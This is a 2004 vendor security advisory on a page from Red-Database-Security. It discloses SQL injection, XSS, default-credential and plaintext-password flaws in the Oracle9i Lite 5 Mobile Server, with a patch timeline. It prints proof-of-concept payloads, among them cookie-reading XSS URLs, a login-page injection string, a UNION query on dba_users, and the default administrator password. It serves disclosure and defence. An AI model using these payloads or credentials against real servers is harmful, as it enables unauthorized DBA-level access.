Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Multiple security vulnerabilities in Oracle9i Lite 5

Name Multiple security vulnerabilities in Oracle9i Lite 5
Systems Affected Oracle 9i Lite 5(all platforms)
Severity High Risk
Category SQL Injection / CSS
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Advisory 19 Jan 2004 (V 1.0)
Advisory RDS_20040219_1
Time to fix 120 days


Details
There are multiple vulnerabilities in Oracle9i Lite 5 Mobile Server. A valid account is not necessary to exploit one of the vulnerabilities. For all other vulnerabilities a valid login to Oracle9i Lite Mobile Server is necessary. An attacker can gain unauthorized access as DBA to the Oracle database server which contains the Oracle9i Lite schema.

1. Unencrypted password of DBA stored in repository.log
2. Unencrypted passwords in MOBILEADMIN.APPLICATIONS.DBPWD
3. Default (and unencrypted) password for Webtogo-Administrator
4. XSS in Oracle 9i Lite
5. XSS in Oracle 9i Lite
6. SQL-Injection in Oracle Lite 5i in siteside.jsp
7. SQL-Injection in Oracle Lite 5i in appside.jsp
8. SQL-Injection in Oracle Lite 5i in userside.jsp
9. SQL-Injection in Oracle Lite 5i in search
10.SQL-Injection via login-page
11.SQL-Injection in User Group Properties


Workarounds
There are no workarounds for these security vulnerabilities.


Example

1. Default (and unencrypted) Password for Webtogo-Administrator
Login to Webtogo
http://server01/webtogo/index.html
user: Administrator
Password: admin
==> Account + unencrypted password is defined in the following file $OH/Mobile/Server/Repository/serveracl.ini
==> Encryption is disabled by default (ENCRYPTED=FALSE)

2. XSS in Oracle 9i Lite
http://server01/webtogo/WLTop/edbkmk?itemid='<script>alert(document.cookie);</script>

3. XSS in Oracle 9i Lite
http://server01/webtogo/admin/console/ccmenu?order=1'<script>alert(document.cookie);</script>

4. SQL-Injection in Oracle Lite 5i in siteside.jsp
http://server01/webtogo/admin/console/siteside.jsp#
==> ' Result: ORA-01756: quoted string not properly terminated
==> ' or 1=1' Result: ORA-00933: SQL command not properly ended
==> '|| or 1=1' Result: ORA-00936: missing expression

5. SQL-Injection in Oracle Lite 5i in appside.jsp
http://server01/admin/console/appside.jsp#
==> ' Result: ORA-01756: quoted string not properly terminated
==> ' or 1=1' Result: ORA-00933: SQL command not properly ended
==> '|| or 1=1' Result: ORA-00936: missing expression

6. SQL-Injection in Oracle Lite 5i in userside.jsp
http://server01/webtogo/admin/console/userside#
==> ' Result: ORA-01756: quoted string not properly terminated
==> ' or 1=1' Result: ORA-00933: SQL command not properly ended
==> '|| or 1=1' Result: ORA-00936: missing expression

7. Injection in Oracle Lite 5i in search
http://laptop01/webtogo/admin/console/search?criterea=username&query=&searchtype=2&sortcolumn=name'&sortdirection=asc
==> ORA-01756: quoted string not properly terminated

8. Inject SQL-Commands without a valid user account from the login-screen
a. Go to the Login-Page
http://server01/webtogo/index.html
Username: %' or name like 'alex%
Password: aaa
b. Press Login
c. Oracle Lite returns an error message but the following SQL-statements is executed
“select id, user_role from users where name='%' OR NAME LIKE 'ALEX%'”

9. SQL-Injection in User Group Properties:
http://server01/webtogo/admin/console/groupsinfo?groups
' UNION select 1,null from dba_users where password like '%
==> ORA-01789: query block has incorrect number of result columns



Patch Information
An advisory from Oracle is available on OTN:
http://otn.oracle.com/deploy/security/pdf/2004alert63.pdf

A patch for Oracle Lite 5.0.2 is available on Metalink:
[metalink.oracle.com]

History
21-oct-2003 Oracle secalert was informed about two security vulnerabilities
22-oct-2003 Seven additional vulnerabilities reported
23-oct-2003 Two additional vulnerabilities reported
23-oct-2003 Bug confirmed
18-feb-2004 Oracle published alert 63
25-apr-2005 Example and time to fix added


© 2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Workflow

Oracle Workflow is a complete business process management solution embedded in the Oracle database.

Its technology enables modeling, automation, and continuous improvement of business processes, routing information of any type according to user-defined business rules.

Oracle Workflow provides customers a scalable, production workflow system tuned for the high volumes associated with enterprise applications.